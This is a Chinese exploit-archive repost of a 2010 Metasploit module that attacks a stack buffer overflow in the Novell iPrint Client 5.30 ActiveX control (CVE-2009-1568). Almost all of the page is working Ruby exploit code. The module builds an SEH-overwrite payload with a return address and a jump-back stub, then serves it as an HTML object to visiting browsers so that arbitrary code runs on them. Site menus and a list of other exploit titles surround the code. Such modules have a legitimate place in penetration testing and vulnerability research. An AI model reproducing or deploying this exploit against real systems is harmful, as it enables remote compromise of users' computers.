首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell iPrint Client ActiveX Control target-frame Buffer Overflow(meta)
来源:http://www.metasploit.com 作者:jduck 发布时间:2010-02-08  
##
# $Id: novelliprint_target-frame.rb 8338 2010-02-01 03:33:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Novell iPrint Client ActiveX Control target-frame Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Novell iPrint Client 5.30. When
				passing an overly long string via the "target-frame" parameter to ienipp.ocx
				an attacker can execute arbitrary code.

				NOTE: The "operation" variable must be set to a valid command in order to reach this
				vulnerability.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'jduck' ],
			'Version'        => '$Revision: 8338 
, 'References' => [ [ 'CVE', '2009-1568' ], [ 'BID', '37242' ], [ 'OSVDB', '60803' ], [ 'URL', 'http://secunia.com/advisories/37169/' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1456, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'iPrint 5.30 Windows Client', { 'Ret' => 0x100489ac } ] # p/p/r in ienipp.ocx v5.30 ], 'DisclosureDate' => 'Dec 08 2009', 'DefaultTarget' => 0)) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Re-generate the payload. return if ((p = regenerate_payload(cli)) == nil) sploit = p.encoded # the following must be an invalid pointer (unreadable) sploit << [rand(0xffffffff) | 0xc0000000].pack('V') sploit << generate_seh_record(target.ret) distance = 8 + 4 + payload_space sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string sploit << rand_text_alphanumeric(2048 - sploit.length) operations = [ "op-client-interface-version", "op-client-version-info", "op-client-is-printer-installed", "op-user-get-role", "op-printer-install", "op-printer-remove", "op-printer-get-status", "op-printer-get-info", "op-printer-pause", "op-printer-resume", "op-printer-purge-jobs", "op-printer-list-users-jobs", "op-printer-list-all-jobs", "op-printer-send-test-page", "op-printer-send-file", "op-printer-setup-install", "op-job-get-info", "op-job-hold", "op-job-release-hold", "op-job-cancel", "op-job-restart", "op-dbg-printer-get-all-attrs", "op-dbg-job-get-all-attrs" ] operation = operations[rand(operations.length)] # escape single quotes sploit = xml_encode(sploit) content = %Q|<html> <object classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'> <param name='operation' value='#{operation}' /> <param name='target-frame' value='#{sploit}' /> </object> </html> | content = Rex::Text.randomize_space(content) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end def xml_encode(str) ret = "" str.unpack('C*').each { |ch| case ch when 0x41..0x5a, 0x61..0x7a, 0x30..0x39 ret << ch.chr else ret << "&#x" ret << ch.chr.unpack('H*')[0] ret << ";" end } ret end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Novell iPrint Client ActiveX C
·AstonSoft DeepBurner (DBR File
·MySQL yaSSL CertDecoder::GetNa
·Audiotran 1.4.1 (PLS File) Sta
·'Wireshark LWRES Dissector get
·UplusFtp Server v1.7.0.12 Remo
·Signed Applet Social Engineeri
·Remote command execution explo
·Ipswitch IMAIL 11.01 reversibl
·OpenCart suffers from a cross
·Opera 10.10 Remote Code Execut
·RPC.cmsd remote PoC for AIX 6.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved